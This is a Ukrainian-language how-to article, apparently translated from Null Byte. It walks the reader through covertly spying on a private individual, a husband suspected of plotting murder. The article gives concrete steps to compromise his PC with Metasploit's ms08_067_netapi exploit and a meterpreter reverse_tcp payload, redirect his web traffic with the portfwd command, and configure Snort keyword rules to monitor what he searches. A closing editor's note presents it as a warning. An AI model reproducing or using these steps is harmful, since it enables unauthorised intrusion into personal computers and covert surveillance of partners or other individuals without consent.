Зламувати як профі: створюємо свій власний шпигунський інструмент подібний PRISM
Рейтинг статті: / 2
НайгіршеНайкраще 

Профессиональный взлом

В останні тижні одкровення, що АНБ (NSA) шпигувало за всіма нами, дало багатьом людям зброю в руки.
Автор вважає, що все це прийняв відразу, як тільки припустив, що АНБ шпигує за всіма нами весь час. Не зрозумійте автора неправильно, автор не виправдовує їх - він просто знає, що таке NSA.
В принципі, програма PRISM, яку АНБ використовує, щоб шпигувати, може переглядати веб-трафік, шукаючи ключові слова і попереджаючи АНБ, коли ці слова зустрічаються. А тепер уявіть, що Ви приватний детектив. Ви найняті жінкою, яка думає, що її чоловік замишляє її вбивство. Чи можемо ми розвивати свої власні PRISM, щоб виявити чи він насправді планує це вбивство, чи їй просто ввижається?
Відповідь на це питання ... Звичайно!
Для цього нам знадобиться кілька речей. По-перше, ми повинні йти на компроментацію комп'ютера підозрюваного з використанням Metasploit. По-друге, нам потрібно перенаправити весь інтернет-трафік підозрюваного через наш комп'ютер. По-третє, ми повинні будемо створити сніффер в лінії передачі, який буде шукати ключові слова, що можуть вказувати на плани.
Досить просто, чи не так?
Крок 1: Компроментація комп'ютера підозрюваного
Почнемо з Metasploit і завантажимо експлойт та корисне навантаження. Переконайтеся, що корисне навантаження є одним з потужних meterpreter в Metasploit.
Автор використовує корисне навантаження exploit/windows/smb/ms08_067_netapi exploit with the windows/meterpreter/reverse_tcp, але Ви можете використовувати будь-яку кількість методів, щоб запустити meterpreter на машині підозрюваного, в тому числі, malicious PDF, Word doc, посилання на шкідливий сервер і т.д.
Профессиональный взлом-1
Тепер, давайте використаємо систему і отримаємо підказки meterpreter, як показано нижче:
Профессиональный взлом-2
Крок 2: Перенаправлення трафіку
Meterpreter є зручною маленькою програмою, яка може перенаправити трафік з комп'ютера жертви на будь-який комп'ютер за нашим вибором. Це називається переадресацією портів і може бути зроблено командою portfwd. Так, пишемо:
·    meterpreter > portfwd -L 192.168.1.115 -l 80 -r 192.168.1.114 -p 80
Де:
  • L - локальний хост
  • l - локальний порт
  • r - віддалений хост
  • p - віддалений порт
Профессиональный взлом-3
Дана команда буде перенаправляти трафік з порта 80 (HTTP) жертви на наш 80-й порт, де ми зможемо цей трафік перевірити.
Крок 3: Налаштування сніффера (Open Snort)
Snort є сніффером з відкритим вихідним кодом і системою виявлення вторгнень (IDS), які можуть бути пристосовані для цього завдання. Snort перевіряє трафік і шукає сигнатури шкідливого трафіку. Однією з переваг Snort є те, що він дозволяє нам писати свої власні правила і налаштувати його будь-яким способом, який хочемо.
Snort попередньо встановлений на BackTrack, економлячи наш час і енергію. Ми можемо дістатися до каталогу Snort, набравши:
·    cd /etc/snort
Потім можемо переглянути вміст каталогу за допомогою команди:
·    /etc/snort ls -l
Ви повинні отримати екран, який нижче:
Профессиональный взлом-4
Крок 4: Налаштування сніффера (конфігурування KWrite)
Як автор вже говорив, майже всі файли в Linux, і майже всі конфігураційні файли є простими текстовими файлами. Конфігураційним файлом Snort є snort.conf і Ви можете побачити його в каталозі /etc/snort. Давайте відкриємо його з KWrite.
·    kwrite /etc/snort/snort.conf
Профессиональный взлом-5
Цей файл конфігурації можна використати, щоб припасувати Snort до будь-якого середовища. Для наших цілей ми будемо використовувати конфігурацію за замовчуванням з єдиним винятком правил, які ми додамо.
Якщо ми прокрутимо вниз до нижньої частини цього файлу, то побачимо "includes", які вказують Snort правила, що використовуються для перевірки трафіку.
Профессиональный взлом-6
З метою використання Snort для створення нашого PRISM-подібної системи, ми не зацікавлені в правилах пошуку шкідливого трафіку - ми хочемо створити правила, які орієнтовані на пошук ключових слів у веб-трафіку підозрюваного. Щоб зробити це, ми повинні закоментувати всі, але локальні правила (закоментувати рядки означає, що програма не буде їх використовувати). Ми можемо зробити це, помістивши # перед кожною включеною заявою, але локальні (наші) правила.
Профессиональный взлом-7
Коли Ви закінчите коментуванням кожної з включених заяв, але include $RULE_PATH/local.rules, збережіть файл snort.conf і закрийте KWrite.
Крок 5: Налаштування сніффера (написання правил)
Далі нам необхідно написати кілька правил, щоб ловити контрольований інтернет-трафік підозрюваного і зберігати його у локальному каталозі правил.
Профессиональный взлом-8
По-перше, давайте відкриємо каталог локальних правил з KWrite:
·    kwrite /etc/snort/rules/local.rules
Профессиональный взлом-9
Як Ви можете побачити, каталог local.rules порожній. Каталог local.rules призначений для використання правил, які ми пишемо. Правила Snort мають такий основний формат:
alert src.IP src.port --> dst.IP dst.port (content: "ключове слово, яке ми шукаємо», msg: "повідомлення, яке ми хочемо відправляти оператору")
Зараз ми напишемо кілька правил для пошуку ключових слів, щоб Snort попереджав нас, коли вони з'являються в HTTP-трафіку підозрюваного, наприклад, в веб-пошуку:
  • alert any 80 --> any 80 (content: "вбивство", msg: "знайшли ключове слово вбивство")
  • alert any 80 --> any 80 (content: "отрута", msg: "знайшли ключове слово отрута")
  • alert any 80 --> any 80 (content: "задушити", msg: "знайшли ключове слово задушити")
  • alert any 80 --> any 80 (content: "душити", msg: "знайшли ключове слово душити")
Ми могли б продовжувати до нескінченності цей список з ключовими словами, які, гадаємо, можуть вказувати на наміри підозрюваного.
Давайте додамо ці правила в каталог local.rules Snort.
Профессиональный взлом-10
Крок 6: Запуск Snort
Нарешті, ми повинні запустити Snort, перейшовши в BackTrack, потім до Services, далі до Snort і вибрати snort start.
Профессиональный взлом-11
Snort тепер приступить до вивчення всіх пакетів з комп'ютера підозрюваного, коли підозрюваний використовує Google або інший веб-пошуковик, відвідує веб-сайти і т.д. Весь його трафік буде фільтруватися Snort і Вам будуть відправлятися попередження щоразу, коли ці ключові слова знайдені. Тоді ми будемо знати напевно, що підозрюваний готується до вбивства своєї дружини!
Примітка редактора: Надіюсь, що цей навчальний приклад переконав Вас, як легко поставити Ваш комп’ютер під нагляд та перехоплювати весь Ваш трафік. Попереджений, значить озброєний. Будьте обережні!
(Джерело EN: null-byte.wonderhowto.com)
 
>
КнигаНовиниПрактика пошукуПартнериПро нас
Підтримка та дизайн: Могильний С.С. Шаблон: Joomla Templates by BuyHTTP Joomla Hosting